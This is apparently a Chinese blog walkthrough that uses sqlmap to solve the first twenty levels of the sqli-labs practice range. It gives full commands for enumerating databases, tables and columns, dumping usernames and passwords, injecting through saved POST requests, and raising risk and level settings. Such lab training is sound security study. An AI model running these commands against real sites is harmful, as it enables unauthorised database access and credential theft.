衡水專業(yè)網(wǎng)站建設(shè)公司抖音推廣網(wǎng)站
這個(gè)星期我們用手動(dòng)注入打了前20關(guān)靶場(chǎng),今天我們用sqlmap直接梭哈前20關(guān)
1.介紹sqlmap
sqlmap是一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描,發(fā)現(xiàn)并利用給定的URL和SQL注入漏洞。
2.下載和使用sqlmap
官方下載地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
下載壓縮包,之后解壓
那怎么使用呢???
打開sqlmap被解壓到的地方,我解壓到了F盤
直接在紅色筐子里輸入cmd,即可打開窗口使用sqlmap
3.sqlmap基本語(yǔ)法
sqlmap是由python寫成
使用方法:python sqlmap.py -參數(shù)
常用用法
1.-h
-h是顯示基本用法
語(yǔ)法:python sqlmap.py -h
2. -u
-u是基礎(chǔ)參數(shù),后面跟需要測(cè)試的URL,常用于GET類型的注入
語(yǔ)法:python sqlmap.py -u "URL"
3.--batch
--batch是,可以在所有需要用戶手動(dòng)輸入的的部分(通常是詢問(wèn)執(zhí)行yes還是no【樣子是[Y/n]】),執(zhí)行默認(rèn)操作,不需要用戶再輸入
語(yǔ)法:python sqlmap.py -u "URL" --batch
4.--level 等級(jí)
--level是,測(cè)試等級(jí),等級(jí)越高,測(cè)試越復(fù)雜,共有五級(jí),當(dāng)默認(rèn)集數(shù)測(cè)試不出來(lái)時(shí)。可以提高等級(jí)。
語(yǔ)法:python sqlmap.py -u "URL" --level
其余我們?cè)谧鲋薪榻B。
4.解題
Less-1——Less-10(GET類型)
前十關(guān)解法相同,以第一關(guān)為例
1.庫(kù)名? --dbs 查詢庫(kù)名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs
?
2.表名???-D 表名 --tables 查詢表名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security --tables
3.列名??-D 表名 -T 列名 --columns 查詢列名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users --columns
4.字段? -D 表名 -T 列名 -C 字段 --dump 查詢字段
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users -C username,password --dump
?
要是這幾關(guān)有的查詢不出來(lái),記得還有--level 等級(jí),等級(jí)提升這一操作
Less-11——Less-17(POST基礎(chǔ)注入)
從11關(guān)開始就需要bp抓包啦
創(chuàng)建一個(gè)文本文檔在sqlmap文件夾中,將POST報(bào)文保存在文本文檔中!
-r?
代表文檔
語(yǔ)法:python sqlmap.py -r 文本文檔
1.庫(kù)名
python sqlmap.py -r 11.txt --batch -dbs
?
2.表名
python sqlmap.py -r 11.txt?--batch -D security --tables
?
3.列名
python sqlmap.py -r 11.txt?--batch -D security -T users --columns
?
4.字段
python sqlmap.py -r 11.txt --batch -D security -T users -C username,password --dump
?
Less15-17這幾關(guān)sqlmap跑的特別慢,大家耐心等待,17關(guān)記得輸入一個(gè)用戶名再抓包!
Less18——Less20
這幾關(guān)會(huì)發(fā)現(xiàn)爆表爆不出來(lái)
提示讓用--level --risk 前面介紹 level了,那什么是risk呢?
“risk”參數(shù)用于控制攻擊的深度,數(shù)值越高,攻擊的幅度越大,但也會(huì)增加攻擊被發(fā)現(xiàn)的風(fēng)險(xiǎn);
//庫(kù)名
python sqlmap.py -r 18.txt --batch -dbs --level=3 --risk=3
?之后操作也是一樣的!!!
工具注入還是十分方便,但是還是得熟練手工注入!!!!?